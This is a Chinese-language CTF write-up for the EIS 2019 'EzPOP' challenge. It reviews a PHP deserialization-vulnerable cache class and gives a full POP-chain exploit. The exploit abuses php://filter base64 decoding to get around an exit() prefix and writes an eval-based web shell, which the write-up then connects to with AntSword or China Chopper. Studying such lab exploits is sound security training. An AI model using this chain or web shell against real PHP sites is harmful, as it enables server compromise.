[EIS 2019]EzPOP 1
目錄
考察內容
解題思路
解題流程
新知識點
題目地址
考察內容
反序列化,檔案上傳,程式碼審計
解題思路
首先耐心閱讀完每段程式碼,發現__destruct,unserialize(),考察反序列化知識,file_put_contents()考察檔案上傳知識。
第一:發現file_put_contents函式有兩個引數filename和data,所以一個是寫入shell的路徑和shell的資料
data與死亡exit進行連線(可繞過)
第二 :filename引數是options['prefix']和$name進行拼接的結果,而這裡的**$name是形參**,所以這個$name是A類的key變數,是由save函式傳遞過來的由於options[‘prefix’]可控所以這裡我們可以使
options['prefix']="php://filter/write=convert.base64-decode/resource="; key="webshell.php";
第三:構造shell的內容,也就是data變數,而data變數被serialize函式處理,是通過set函式中的$value變數傳遞過來的,而$value變數是A類中的**$contents變數傳遞**過來的,所以我們可以構造cache這個變數為陣列,然後經過兩個函式的處理,我們可以控制complete這個變數為shell的資料,經過json_encod這個函式的處理之後,由於json格式的字元都不滿足base64編碼的要求,所以我們可以將資料進行base64編碼繞過,也就是
A->complete=base64_encode('xxx',base64_encode('<?php @eval($_POST["ro4lsc"]);?>'))
首先將shellcode進行base64編碼使得base64decode的時候不會影響其內容,然後再次進行base64_encode是為了繞過死亡exit,由於解碼之後只剩21個字元,所以這裡需要自己新增三個字元,使得前面有24個字元可以base64正常解碼不影響後面shellcode的執行那麼到這裡data的內容也構造好了,
第四:可是我們發現使用php偽協議只解了一次編碼,而我們這裡經歷了兩次base64編碼前面提到了一個serialize函式
可以看到返回值是$serialize,也就是說這裡我們可以讓這個變數為base64_decode函式對data變數進行解碼。
第五:public function getForStorage這裡我們還需要傳入一個cache為陣列內容為空
A->cache=array();
第六:現在我們可以看A類save函式這個地方的利用很重要,它呼叫了getForStorage函式,後面的$this->store這個地方得是物件B才能呼叫set函式。所以
A->store = new B();
解題流程
程式碼審計
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store; $this->expire = $expire; } // 對變數進行賦值 public function cleanContents(array $contents) { $cachedProperties = array_flip([ 'path', 'dirname', 'basename', 'extension', 'filename', 'size', 'mimetype', 'visibility', 'timestamp', 'type', ]); foreach ($contents as $path => $object) { if (is_array($object)) { $contents[$path] = array_intersect_key($object, $cachedProperties); } } return $contents; } // array_flip() 用於反轉/交換陣列中所有的鍵名以及它們關聯的鍵值 // => 簡單來說就是=>符號來分隔鍵和值,左側表示鍵,右側表示值 // array_intersect_key() 比較兩個陣列的鍵名,並返回交集: // foreach() 迴圈用於遍歷陣列每一次迴圈,當前陣列元素的鍵與值就都會被賦值給 $key 和 $value 變數(數字指標會逐一地移動),在進行下一次迴圈時,你將看到陣列中的下一個鍵與值。 // 過濾與cachedProperties變數中鍵不同的值 public function getForStorage() { $cleaned = $this->cleanContents($this->cache); return json_encode([$cleaned, $this->complete]); } // Storage 儲存 // 對cache變數的內容進行過濾,傳遞給cleaned,最終返回將cleaned內容轉換為json格式後傳給complete。 // 因為不存在cache變數,所以需要我們構造,所以cache可控,所以complete可控。 public function save() { $contents = $this->getForStorage(); $this->store->set($this->key, $contents, $this->expire); } // 將getForStorage函式的返回值賦給contents,然後用store變數呼叫set函式 // set函式存在於B類中 public function __destruct() { if (!$this->autosave) { $this->save(); } } } // 如果不存在autosave變數就呼叫save函式 class B { protected function getExpireTime($expire): int { return (int) $expire; } // 將expire變數轉換為int型別 public function getCacheKey(string $name): string { return $this->options['prefix'] . $name; } // 拼接字串 // 發現這裡的options[‘prefix’]可控 protected function serialize($data): string { if (is_numeric($data)) { return (string) $data; } $serialize = $this->options['serialize']; return $serialize($data); } // 將傳入的data引數將會格式化為string型別 // 可以看到$serialize變數可控 public function set($name, $value, $expire = null): bool{ $this->writeTimes++; if (is_null($expire)) { $expire = $this->options['expire']; } $expire = $this->getExpireTime($expire); $filename = $this->getCacheKey($name); $dir = dirname($filename); if (!is_dir($dir)) { try { mkdir($dir, 0755, true); } catch (\Exception $e) { // 建立失敗 } } $data = $this->serialize($value); if ($this->options['data_compress'] && function_exists('gzcompress')) { //資料壓縮 $data = gzcompress($data, 3); } $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data; $result = file_put_contents($filename, $data); if ($result) { return true; } return false; } // is_null()判斷引數是否為NULL,若為空,則將options['expire']賦值給expire // expire變數呼叫了getExpireTime這個函式,格式化為int型別 // filename變數呼叫了getCacheKey這個函式,所以filename這個變數最終的值是和options[‘prefix’]拼接而成,然後根據filename建立目錄 // 接著看到data變數呼叫了serialize函式,正好這個函式需要傳入一個值 // 接下來對data進行壓縮 // 最後這個地方data資料與<?php exit();?連線,也就是說即使我們傳上了木馬也無濟於事,會直接退出,也就是PHP中的死亡exit(). } if (isset($_GET['src'])) { highlight_file(__FILE__); } $dir = "uploads/"; if (!is_dir($dir)) { mkdir($dir); } unserialize($_GET["data"]);
payload:
<?php class A{ protected $store; protected $key; protected $expire; public function __construct() { $this->cache = array(); $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_POST["ro4lsc"]);?>')); $this->key = "shell.php"; $this->store = new B(); $this->autosave = false; $this->expire = 0; } } class B{ public $options = array(); function __construct() { $this->options['serialize'] = 'base64_decode'; $this->options['prefix'] = 'php://filter/write=convert.base64-decode/resource='; $this->options['data_compress'] = false; } } echo urlencode(serialize(new A()));
驗證
使用?data=傳遞引數,它會在當前工作目錄建立一個shell.php,菜刀orAntSword連線getshell。
新知識點
php://filter的妙用
這個地方data資料與<?php exit();?>連線,也就是說即使我們傳上了木馬也無濟於事,會直接退出,也就是PHP中的死亡exit(),但是也不是沒有繞過的方法,這裡引用@p神的一篇文章由於<、?、()、;、>、\n都不是base64編碼的範圍,所以base64解碼的時候會自動將其忽略,所以解碼之後就剩phpexit了,但是呢base64演算法解碼時是4個位元組一組,所以我們還需要在前面加個字元
題目地址
https://buuoj.cn/challenges